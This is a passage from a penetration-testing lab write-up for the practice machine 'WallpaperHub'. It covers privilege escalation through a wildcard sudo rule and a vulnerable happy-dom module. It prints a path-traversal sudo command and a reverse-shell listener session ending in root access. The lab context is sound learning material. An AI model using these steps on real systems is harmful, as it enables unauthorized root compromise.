CVE-2024-51757
The wp_hub user has sudo privileges to execute the /usr/bin/web-scraper /root/web_src_downloaded/*.html command as the root account without getting prompted for password. The command itself is vulnerable to wildcard injection due to the use of the wildcard bit(*). Additionally, the /usr/bin/web-scraper is a custom NodeJS application that uses an outdated and vulnerable version of happy-dom module that is prone to code injection attack; CVE-2024-51757
/Practice/WallpaperHub/5-Privilege_Escalation/attachments/{A14DCE66-2D2B-4126-AFBB-50F78EC6B62A}.png)
A vulnerability was found in capricorn86 happy-dom up to 15.10.1. It has been classified as critical. Affected is some unknown functionality. The manipulation with an unknown input leads to a code injection vulnerability. CWE is classifying the issue as CWE-94. The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. This is going to have an impact on confidentiality, integrity, and availability.
Exploit
/Practice/WallpaperHub/5-Privilege_Escalation/attachments/{1A2A99A8-ED94-4F9B-90FD-AAE22EA771E7}.png)
PoC is available
Exploitation
/Practice/WallpaperHub/5-Privilege_Escalation/attachments/{8DB5C8FD-2BD9-467F-AECA-A55EC5BF201A}.png)
Besides the CVE-2024-51757 vulnerability, the core issue lies in the use of a wildcard bit(*) in the sudo privilege command
wp_hub@wallpaperhub:~$ sudo -u root /usr/bin/web-scraper /root/web_src_downloaded/../../tmp/pe.htmlAs it could easily be bypassed with path traversal to include the malicious HTML file; ../../tmp/pe.html
/Practice/WallpaperHub/5-Privilege_Escalation/attachments/{78F337A2-9DA5-4BD4-A0B7-A7B400CEDE49}.png)
Execution flow was captured by PSPY
The payload was called
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wallpaperhub]
└─$ nnc 5000
listening on [any] 5000 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.106.204] 52210
root@wallpaperhub:~# whoami
root
root@wallpaperhub:~# hostname
wallpaperhub
root@wallpaperhub:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:2f:55 brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.106.204/24 brd 192.168.106.255 scope global ens192
valid_lft forever preferred_lft foreverSystem level compromise